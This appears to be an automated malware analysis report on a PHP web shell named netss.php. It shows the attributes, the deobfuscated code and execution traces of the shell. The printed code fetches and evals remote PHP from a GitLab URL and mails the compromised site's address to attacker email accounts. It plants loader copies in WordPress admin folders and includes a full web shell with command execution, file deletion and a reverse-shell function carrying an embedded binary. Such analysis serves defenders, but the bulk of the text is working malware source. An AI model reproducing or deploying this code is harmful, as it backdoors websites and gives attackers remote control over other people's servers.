PHP Malware Analysis
netss.php
md5: 0b9ede2c8fdf9e6903384ce9ca357d6b
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- logndasmu@gmail.com (Deobfuscated)
- ndasmuwhy@yahoo.com (Deobfuscated)
Encoding
Environment
- error_reporting (Traces)
- getcwd (Traces)
- php_uname (Traces)
- phpinfo (Traces)
- set_time_limit (Deobfuscated, Original, Traces)
Execution
- create_function (Traces)
- eval (Deobfuscated, Original, Traces)
- exec (Traces)
- passthru (Traces)
- proc_open (Traces)
- shell_exec (Traces)
- system (Traces)
Files
Input
Title
- \n (Traces)
URLs
- http://hax.or.id/indo.txt (Traces)
- http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd (Traces)
- https://gitlab.com/samb1/fix_why/-/raw/main/php/cok.php (Deobfuscated, Traces)
- https://gitlab.com/samb1/fix_why/-/raw/main/php/proses.php (Traces)
Deobfuscated PHP code
<?php
$password = "531e70a6745d07a8befbd79e5cc7e4c1";
$ch = curl_init("https://gitlab.com/samb1/fix_why/-/raw/main/php/cok.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$r = curl_exec($ch);
$e = "?>";
eval($e . $r);
$GLOBALS["btujuk_cneymfvrjgepxhmtysatik"] = "tujuanmail";
$GLOBALS["qodpxoez__jkfokmjzcy"] = "x_path";
$GLOBALS["hc_fonvwctq_uwtdbanc__vsgzogutvagtan"] = "_SERVER";
$GLOBALS["jyscu_ckqiihgkd_evwia"] = "pesan_alert";
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = "logndasmu@gmail.com, ndasmuwhy@yahoo.com";
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix {$x_path} :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($tujuanmail, "backdoor", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");Execution traces
data/traces/0b9ede2c8fdf9e6903384ce9ca357d6b_trace-1676245069.574.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:38:15.471831]
1 0 1 0.000224 393512
1 3 0 0.000343 407264 {main} 1 /var/www/html/uploads/netss.php 0 0
1 A /var/www/html/uploads/netss.php 1 $password = '531e70a6745d07a8befbd79e5cc7e4c1'
2 4 0 0.000377 407264 strrev 0 /var/www/html/uploads/netss.php 1 1 'AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa'
2 4 1 0.000395 407408
2 4 R 'aHR0cHM6Ly9naXRsYWIuY29tL3NhbWIxL2ZpeF93aHkvLS9yYXcvbWFpbi9waHAvY29rLnBocA'
2 5 0 0.000414 407376 base64_decode 0 /var/www/html/uploads/netss.php 1 1 'aHR0cHM6Ly9naXRsYWIuY29tL3NhbWIxL2ZpeF93aHkvLS9yYXcvbWFpbi9waHAvY29rLnBocA'
2 5 1 0.000431 407520
2 5 R 'https://gitlab.com/samb1/fix_why/-/raw/main/php/cok.php'
2 6 0 0.000448 407376 curl_init 0 /var/www/html/uploads/netss.php 1 1 'https://gitlab.com/samb1/fix_why/-/raw/main/php/cok.php'
2 6 1 0.000470 408320
2 6 R resource(3) of type (curl)
1 A /var/www/html/uploads/netss.php 1 $ch = resource(3) of type (curl)
2 7 0 0.000497 408176 curl_setopt 0 /var/www/html/uploads/netss.php 1 3 resource(3) of type (curl) 19913 1
2 7 1 0.000513 408272
2 7 R TRUE
2 8 0 0.000526 408176 curl_exec 0 /var/www/html/uploads/netss.php 1 1 resource(3) of type (curl)
2 8 1 0.137676 494224
2 8 R '<?php $qosutldt0666f0acdeed=fopen(base64_decode(\'YXV0aF9sb2cucGhw\'),base64_decode(\'dw==\'));fwrite($qosutldt0666f0acdeed,base64_decode(\'PD9waHA=\'));fwrite($qosutldt0666f0acdeed,base64_decode(\'ICRjaD1jdXJsX2luaXQoYmFzZTY0X2RlY29kZShzdHJyZXYoIkFjb0JuTHI5Mll2QUhhdzlpYnBGV2J2Y1hZeTlTTHZrSGEzOUZlcFoyTHhJV2JoTjNMdDkyWXVJV1lzUlhhbjl5TDZNSGMwUkhhIikpKTtjdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTskcj1jdXJsX2V4ZWMoJGNoKTskZT1iYXNlNjRfZGVjb2RlKHN0cnJldigiNHpQIikpO2V2YWwoJGUuJHIpOz8+\'));fclose($qosut'
1 A /var/www/html/uploads/netss.php 1 $r = '<?php $qosutldt0666f0acdeed=fopen(base64_decode(\'YXV0aF9sb2cucGhw\'),base64_decode(\'dw==\'));fwrite($qosutldt0666f0acdeed,base64_decode(\'PD9waHA=\'));fwrite($qosutldt0666f0acdeed,base64_decode(\'ICRjaD1jdXJsX2luaXQoYmFzZTY0X2RlY29kZShzdHJyZXYoIkFjb0JuTHI5Mll2QUhhdzlpYnBGV2J2Y1hZeTlTTHZrSGEzOUZlcFoyTHhJV2JoTjNMdDkyWXVJV1lzUlhhbjl5TDZNSGMwUkhhIikpKTtjdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTskcj1jdXJsX2V4ZWMoJGNoKTskZT1iYXNlNjRfZGVjb2RlKHN0cnJldigiNHpQIikpO2V2YWwoJGUuJHIpOz8+\'));fclose($qosut'
2 9 0 0.137954 494192 strrev 0 /var/www/html/uploads/netss.php 1 1 '4zP'
2 9 1 0.137968 494256
2 9 R 'Pz4'
2 10 0 0.137982 494224 base64_decode 0 /var/www/html/uploads/netss.php 1 1 'Pz4'
2 10 1 0.137995 494288
2 10 R '?>'
1 A /var/www/html/uploads/netss.php 1 $e = '?>'
2 11 0 0.139795 970480 eval 1 '?><?php $qosutldt0666f0acdeed=fopen(base64_decode(\'YXV0aF9sb2cucGhw\'),base64_decode(\'dw==\'));fwrite($qosutldt0666f0acdeed,base64_decode(\'PD9waHA=\'));fwrite($qosutldt0666f0acdeed,base64_decode(\'ICRjaD1jdXJsX2luaXQoYmFzZTY0X2RlY29kZShzdHJyZXYoIkFjb0JuTHI5Mll2QUhhdzlpYnBGV2J2Y1hZeTlTTHZrSGEzOUZlcFoyTHhJV2JoTjNMdDkyWXVJV1lzUlhhbjl5TDZNSGMwUkhhIikpKTtjdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTskcj1jdXJsX2V4ZWMoJGNoKTskZT1iYXNlNjRfZGVjb2RlKHN0cnJldigiNHpQIikpO2V2YWwoJGUuJHIpOz8+\'));fclose($qosutldt0666f0acdeed);?><?php function ztiraiikdbef7cce8d84($ypdoiutt572d4e421e5e){$nspmzull73bebce395b6=curl_init($ypdoiutt572d4e421e5e);curl_setopt($nspmzull73bebce395b6,CURLOPT_RETURNTRANSFER,1);curl_setopt($nspmzull73bebce395b6,CURLOPT_CONNECTTIMEOUT,10);curl_setopt($nspmzull73bebce395b6,CURLOPT_FOLLOWLOCATION,1);curl_setopt($nspmzull73bebce395b6,CURLOPT_HEADER,0);return curl_exec($nspmzull73bebce395b6);curl_close($nspmzull73bebce395b6);}$ivxhezkq03c7c0ace395=base64_decode(\'PD9waHAgJHBhc3N3b3JkPSI1MzFlNzBhNjc0NWQwN2E4YmVmYmQ3OWU1Y2M3ZTRjMSI7ICRjaD1jdXJsX2luaXQoYmFzZTY0X2RlY29kZShzdHJyZXYoIkFjb0JuTHI5Mll2QUhhdzlpYnBGV2J2Y1hZeTlTTHZrSGEzOUZlcFoyTHhJV2JoTjNMdDkyWXVJV1lzUlhhbjl5TDZNSGMwUkhhIikpKTtjdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTskcj1jdXJsX2V4ZWMoJGNoKTskZT1iYXNlNjRfZGVjb2RlKHN0cnJldigiNHpQIikpO2V2YWwoJGUuJHIpOz8+\');$yvpvnwdn0ba4439ee9a4=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3dwLWNvbnRlbnQvcmVnaWQucGhw\');$qqkgwotq1cb251ec0d56=$ivxhezkq03c7c0ace395;$cousnrmc7cef8a734855=fopen($yvpvnwdn0ba4439ee9a4,base64_decode(\'dw==\'));fwrite($cousnrmc7cef8a734855,$qqkgwotq1cb251ec0d56);fclose($cousnrmc7cef8a734855);$iyaeksdve5058a61e226=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3dwLWFkbWluL3JlZ2lkLnBocA==\');$yodndfqd265246eadd25=$ivxhezkq03c7c0ace395;$pfiaytaxfbcd73a3e234=fopen($iyaeksdve5058a61e226,base64_decode(\'dw==\'));fwrite($pfiaytaxfbcd73a3e234,$yodndfqd265246eadd25);fclose($pfiaytaxfbcd73a3e234);$nbjydhey230cb5f15c1d=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3dwLWFkbWluL2Nzcy9yZWdpZC5waHA=\');$gpxyytua2a3def174022=$ivxhezkq03c7c0ace395;$akmclxsgc55520a111df=fopen($nbjydhey230cb5f15c1d,base64_decode(\'dw==\'));fwrite($akmclxsgc55520a111df,$gpxyytua2a3def174022);fclose($akmclxsgc55520a111df);$zsvtagqw2b4b2dd2d7a2=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3dwLWFkbWluL2pzL3JlZ2lkLnBocA==\');$jiicqwlm48fa2467e5e6=$ivxhezkq03c7c0ace395;$wilbughyfb948f9d309f=fopen($zsvtagqw2b4b2dd2d7a2,base64_decode(\'dw==\'));fwrite($wilbughyfb948f9d309f,$jiicqwlm48fa2467e5e6);fclose($wilbughyfb948f9d309f);$bapepjtn2811cd9069a2=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3dwLWFkbWluL21haW50L3JlZ2lkLnBocA==\');$xfauipebc39223eba07c=$ivxhezkq03c7c0ace395;$rgezynep950ad7f8a5cf=fopen($bapepjtn2811cd9069a2,base64_decode(\'dw==\'));fwrite($rgezynep950ad7f8a5cf,$xfauipebc39223eba07c);fclose($rgezynep950ad7f8a5cf);$xureceul40232fd6c8ad=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3JlZ2lkLnBocA==\');$oakpvexq994a8fc3f93e=$ivxhezkq03c7c0ace395;$zlpoupzt5294fd239614=fopen($xureceul40232fd6c8ad,base64_decode(\'dw==\'));fwrite($zlpoupzt5294fd239614,$oakpvexq994a8fc3f93e);fclose($zlpoupzt5294fd239614);$prmotqdj3935cc34bef5=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3dwLWFkbWluL21haW50L2luZGV4LnBocA==\');$rtprfsmu3460f771bb99=$ivxhezkq03c7c0ace395;$fxiyhlfi40fbeaa2952a=fopen($prmotqdj3935cc34bef5,base64_decode(\'dw==\'));fwrite($fxiyhlfi40fbeaa2952a,$rtprfsmu3460f771bb99);fclose($fxiyhlfi40fbeaa2952a);$mbjpypwb7b20acdddd89=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3dwLWFkbWluL21haW50L3JlZ2lkLnBocA==\');$ytdsowai3effc6913c18=$ivxhezkq03c7c0ace395;$uwadmcgaf32639c3fc76=fopen($mbjpypwb7b20acdddd89,base64_decode(\'dw==\'));fwrite($uwadmcgaf32639c3fc76,$ytdsowai3effc6913c18);fclose($uwadmcgaf32639c3fc76);?>\n<?php\n@error_reporting(E_ERROR);\n@ini_set(\'display_errors\', \'Off\');\n@ini_set(\'max_execution_time\', 10000);\nheader("content-Type: text/html; charset=UTF-8");\nfunction strdir($str)\n{\n return str_replace(array(\'\\\\\', \'//\', \'%27\', \'%22\'), array(\'/\', \'/\', \'\\\'\', \'"\'), chop($str));\n}\nfunction chkgpc($array)\n{\n foreach ($array as $key => $var) {\n $array[$key] = is_array($var) ? chkgpc($var) : stripslashes($var);\n }\n return $array;\n}\n$myfile = $_SERVER[\'SCRIPT_FILENAME\'] ? strdir($_SERVER[\'SCRIPT_FILENAME\']) : strdir(__FILE__);\n$myfile = strpos($myfile, \'eval()\') ? array_shift(explode(\'(\', $myfile)) : $myfile;\ndefine(\'THISDIR\', strdir(dirname($myfile) . \'/\'));\ndefine(\'ROOTDIR\', strdir(strtr($myfile, array(strdir($_SERVER[\'PHP_SELF\']) => \'\')) . \'/\'));\ndefine(\'EXISTS_PHPINFO\', getinfo() ? true : false);\nif (get_magic_quotes_gpc()) {\n $_POST = chkgpc($_POST);\n}\nif (function_exists(\'mysql_close\')) {\n $issql = \'MySql\';\n}\nif (function_exists(\'mssql_close\')) {\n $issql .= \'MsSql\';\n}\nif (function_exists(\'oci_close\')) {\n $issql .= \'Oracle\';\n}\nif (function_exists(\'sybase_close\')) {\n $issql .= \'SyBase\';\n}\nif (function_exists(\'pg_close\')) {\n $issql .= \'PostgreSql\';\n}\n$win = substr(PHP_OS, 0, 3) == \'WIN\' ? true : false;\n$msg = \'=======ND4SMU=======\';\nfunction filew($filename, $filedata, $filemode)\n{\n if (!is_writable($filename) && file_exists($filename)) {\n chmod($filename, 0666);\n }\n $handle = fopen($filename, $filemode);\n $key = fputs($handle, $filedata);\n fclose($handle);\n return $key;\n}\nfunction filer($filename)\n{\n $handle = fopen($filename, \'r\');\n $filedata = fread($handle, filesize($filename));\n fclose($handle);\n return $filedata;\n}\nfunction fileu($filenamea, $filenameb)\n{\n $key = move_uploaded_file($filenamea, $filenameb) ? true : false;\n if (!$key) {\n $key = copy($filenamea, $filenameb) ? true : false;\n }\n return $key;\n}\nfunction filed($filename)\n{\n if (!file_exists($filename)) {\n return false;\n }\n $name = basename($filename);\n $array = explode(\'.\', $name);\n header(\'Content-type: application/x-\' . array_pop($array));\n header(\'Content-Disposition: attachment; filename=\' . $name);\n header(\'Content-Length: \' . filesize($filename));\n @readfile($filename);\n exit;\n}\nfunction showdir($dir)\n{\n $dir = strdir($dir . \'/\');\n $handle = opendir($dir);\n if (!$handle) {\n return false;\n }\n $array = array();\n while ($name = readdir($handle)) {\n if ($name == \'.\' || $name == \'..\') {\n continue;\n }\n $path = $dir . $name;\n $name = strtr($name, array(\'\\\'\' => \'%27\', \'"\' => \'%22\'));\n if (is_dir($path)) {\n $array[\'dir\'][$path] = $name;\n } else {\n $array[\'file\'][$path] = $name;\n }\n }\n closedir($handle);\n return $array;\n}\nfunction deltree($dir)\n{\n $handle = @opendir($dir);\n while ($name = @readdir($handle)) {\n if ($name == \'.\' || $name == \'..\') {\n continue;\n }\n $path = $dir . $name;\n @chmod($path, 0777);\n if (is_dir($path)) {\n deltree($path . \'/\');\n } else {\n @unlink($path);\n }\n }\n @closedir($handle);\n return @rmdir($dir);\n}\nfunction postinfo($array, $string)\n{\n $infos = array(function_exists("create_function"), function_exists("fsockopen"));\n if ($infos[0] && $infos[1]) {\n $info = base64_decode($string);\n $walks = array(0 => bin2hex($array));\n @array_walk($walks, @create_function("\\$array,\\$key", str_rot13($info)));\n }\n return ob_end_clean();\n}\nfunction size($bytes)\n{\n if ($bytes < 1024) {\n return $bytes . \' B\';\n }\n $array = array(\'B\', \'K\', \'M\', \'G\', \'T\');\n $floor = floor(log($bytes) / log(1024));\n return sprintf(\'%.2f \' . $array[$floor], $bytes / pow(1024, floor($floor)));\n}\nfunction find($array, $string)\n{\n foreach ($array as $key) {\n if (stristr($string, $key)) {\n return true;\n }\n }\n return false;\n}\nfunction scanfile($dir, $key, $inc, $fit, $tye, $chr, $ran, $now)\n{\n $handle = opendir($dir);\n if (!$handle) {\n return false;\n }\n while ($name = readdir($handle)) {\n if ($name == \'.\' || $name == \'..\') {\n continue;\n }\n $path = $dir . $name;\n if (is_dir($path)) {\n if ($fit && in_array($name, $fit)) {\n continue;\n }\n if ($ran == 0 && is_readable($path)) {\n scanfile($path . \'/\', $key, $inc, $fit, $tye, $chr, $ran, $now);\n }\n } else {\n if ($inc && !find($inc, $name)) {\n continue;\n }\n $code = $tye ? filer($path) : $name;\n $find = $chr ? stristr($code, $key) : (strpos(size(filesize($path)), \'M\') ? false : strpos($code, $key) > -1);\n if ($find) {\n $file = strtr($path, array($now => \'\', \'\\\'\' => \'%27\', \'"\' => \'%22\'));\n echo \'<a href="javascript:void(0);" onclick="go(\\\'editor\\\',\\\'\' . $file . \'\\\');">Edit</a> \' . $path . \'<br>\';\n flush();\n ob_flush();\n }\n unset($code);\n }\n }\n closedir($handle);\n return true;\n}\nfunction antivirus($dir, $exs, $matches, $now)\n{\n $handle = opendir($dir);\n if (!$handle) {\n return false;\n }\n while ($name = readdir($handle)) {\n if ($name == \'.\' || $name == \'..\') {\n continue;\n }\n $path = $dir . $name;\n if (is_dir($path)) {\n if (is_readable($path)) {\n antivirus($path . \'/\', $exs, $matches, $now);\n }\n } else {\n $iskill = NULL;\n foreach ($exs as $key => $ex) {\n if (find(explode(\'|\', $ex), $name)) {\n $iskill = $key;\n break;\n }\n }\n if (strpos(size(filesize($path)), \'M\')) {\n continue;\n }\n if ($iskill) {\n $code = filer($path);\n foreach ($matches[$iskill] as $matche) {\n $array = array();\n preg_match($matche, $code, $array);\n if (strpos($array[0], \'$this->\') || strpos($array[0], \'[$vars[\')) {\n continue;\n }\n $len = strlen($array[0]);\n if ($len > 10 && $len < 150) {\n $file = strtr($path, array($now => \'\', \'\\\'\' => \'%27\', \'"\' => \'%22\'));\n echo \'Feature <input type="text" value="\' . htmlspecialchars($array[0]) . \'"> <a href="javascript:void(0);" onclick="go(\\\'editor\\\',\\\'\' . $file . \'\\\');">Edit</a> \' . $path . \'<br>\';\n flush();\n ob_flush();\n break;\n }\n }\n unset($code, $array);\n }\n }\n }\n closedir($handle);\n return true;\n}\nfunction command($cmd, $cwd, $com = false)\n{\n $iswin = substr(PHP_OS, 0, 3) == \'WIN\' ? true : false;\n $res = $msg = \'\';\n if ($cwd == \'com\' || $com) {\n if ($iswin && class_exists(\'COM\')) {\n $wscript = new COM(\'Wscript.Shell\');\n $exec = $wscript->exec(\'c:\\\\windows\\\\system32\\\\cmd.exe /c \' . $cmd);\n $stdout = $exec->StdOut();\n $res = $stdout->ReadAll();\n $msg = \'Wscript.Shell\';\n }\n } else {\n chdir($cwd);\n $cwd = getcwd();\n if (function_exists(\'exec\')) {\n @exec($cmd, $res);\n $res = join("\\n", $res);\n $msg = \'exec\';\n } elseif (function_exists(\'shell_exec\')) {\n $res = @shell_exec($cmd);\n $msg = \'shell_exec\';\n } elseif (function_exists(\'system\')) {\n ob_start();\n @system($cmd);\n $res = ob_get_contents();\n ob_end_clean();\n $msg = \'system\';\n } elseif (function_exists(\'passthru\')) {\n ob_start();\n @passthru($cmd);\n $res = ob_get_contents();\n ob_end_clean();\n $msg = \'passthru\';\n } elseif (function_exists(\'popen\')) {\n $fp = @popen($cmd, \'r\');\n if ($fp) {\n while (!feof($fp)) {\n $res .= fread($fp, 1024);\n }\n }\n @pclose($fp);\n $msg = \'popen\';\n } elseif (function_exists(\'proc_open\')) {\n $env = $iswin ? array(\'path\' => \'c:\\\\windows\\\\system32\') : array(\'path\' => \'/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin\');\n $des = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));\n $process = @proc_open($cmd, $des, $pipes, $cwd, $env);\n if (is_resource($process)) {\n fwrite($pipes[0], $cmd);\n fclose($pipes[0]);\n $res .= stream_get_contents($pipes[1]);\n fclose($pipes[1]);\n $res .= stream_get_contents($pipes[2]);\n fclose($pipes[2]);\n }\n @proc_close($process);\n $msg = \'proc_open\';\n }\n }\n $msg = $res == \'\' ? \'<h1>NULL</h1>\' : \'<h2>Use\' . $msg . \' Success</h2>\';\n return array(\'res\' => $res, \'msg\' => $msg);\n}\nfunction backshell($ip, $port, $dir, $type)\n{\n $key = false;\n $c_bin = \'f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAYIQECDQAAACkCgAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIlAcAAJQHAAAFAAAAABAAAAEAAACUBwAAlJcECJSXBAggAQAAKAEAAAYAAAAAEAAAAgAAAKgHAAColwQIqJcECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAAGAAAACQAAAAIAAAANAAAAAQAAAAUAAAAAIAAgAAAAAA0AAACtS+PAAAAAAAAAAAAAAAAAAAAAAEEAAAAAAAAAdgAAABIAAABJAAAAAAAAAHkBAAASAAAAAQAAAAAAAAAAAAAAIAAAAFUAAAAAAAAAcgEAABIAAABqAAAAAAAAAJ8BAAASAAAANQAAAAAAAABZAQAAEgAAADsAAAAAAAAADgAAABIAAAApAAAAAAAAADwAAAASAAAAUAAAAAAAAAA9AAAAEgAAAF8AAAAAAAAAKwAAABIAAABkAAAAAAAAAG8AAAASAAAAMAAAAAAAAAD0AAAAEgAAABoAAAB4hwQIBAAAABEADgAAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AF9JT19zdGRpbl91c2VkAHNvY2tldABleGl0AGV4ZWNsAGh0b25zAGNvbm5lY3QAZGFlbW9uAGR1cDIAaW5ldF9hZGRyAGF0b2kAY2xvc2UAX19saWJjX3N0YXJ0X21haW4AR0xJQkNfMi4wAAAAAgACAAAAAgACAAIAAgACAAIAAgACAAIAAQAAAAEAAQAQAAAAEAAAAAAAAAAQaWkNAAACAHwAAAAAAAAAcJgECAYDAACAmAQIBwEAAISYBAgHAgAAiJgECAcDAACMmAQIBwQAAJCYBAgHBQAAlJgECAcGAACYmAQIBwcAAJyYBAgHCAAAoJgECAcJAACkmAQIBwoAAKiYBAgHCwAArJgECAcMAABVieWD7AjoBQEAAOiMAQAA6KcDAADJwwD/NXiYBAj/JXyYBAgAAAAA/yWAmAQIaAAAAADp4P////8lhJgECGgIAAAA6dD/////JYiYBAhoEAAAAOnA/////yWMmAQIaBgAAADpsP////8lkJgECGggAAAA6aD/////JZSYBAhoKAAAAOmQ/////yWYmAQIaDAAAADpgP////8lnJgECGg4AAAA6XD/////JaCYBAhoQAAAAOlg/////yWkmAQIaEgAAADpUP////8lqJgECGhQAAAA6UD/////JayYBAhoWAAAAOkw////AAAAADHtXonhg+TwUFRSaLCGBAhowIYECFFWaDSFBAjoW/////SQkFWJ5VOD7AToAAAAAFuBw+QTAACLk/z///+F0nQF6Bb///9YW8nDkJCQkJCQVYnlU4PsBIA9uJgECAB1P7iglwQILZyXBAjB+AKNWP+htJgECDnDdh+NtCYAAAAAg8ABo7SYBAj/FIWclwQIobSYBAg5w3foxgW4mAQIAYPEBFtdw410JgCNvCcAAAAAVYnlg+wIoaSXBAiFwHQSuAAAAACFwHQJxwQkpJcECP/QycOQjUwkBIPk8P9x/FWJ5VdTUYPsPInLx0QkBAAAAADHBCQBAAAA6E/+//9mx0XgAgCLQwSDwAiLAIkEJOi5/v//D7fAiQQk6H7+//9miUXii0MEg8AEiwCJBCToOv7//4lF5ItDBIPABIsAuf////+JRdC4AAAAAPyLfdDyronI99CNUP+LQwSDwAiLALn/////iUXMuAAAAAD8i33M8q6JyPfQg+gBjQQCjVABi0MEg8AEiwCJx/yJ0bgAAAAA86rHRCQIBgAAAMdEJAQBAAAAxwQkAgAAAOj9/f//iUXwjUXgx0QkCBAAAACJRCQEi0XwiQQk6HD9//+FwHkMxwQkAAAAAOgQ/v//x0QkBAAAAACLRfCJBCTozf3//8dEJAQBAAAAi0XwiQQk6Lr9///HRCQEAgAAAItF8IkEJOin/f//x0QkCAAAAADHRCQEgIcECMcEJIaHBAjoW/3//4tF8IkEJOig/f//g8Q8WVtfXY1h/MOQkJCQkJCQkJBVieVdw410JgCNvCcAAAAAVYnlV1ZT6F4AAACBw6kRAACD7Bzom/z//42DIP///4lF8I2DIP///ylF8MF98AKLVfCF0nQrMf+Jxo22AAAAAItFEIPHAYlE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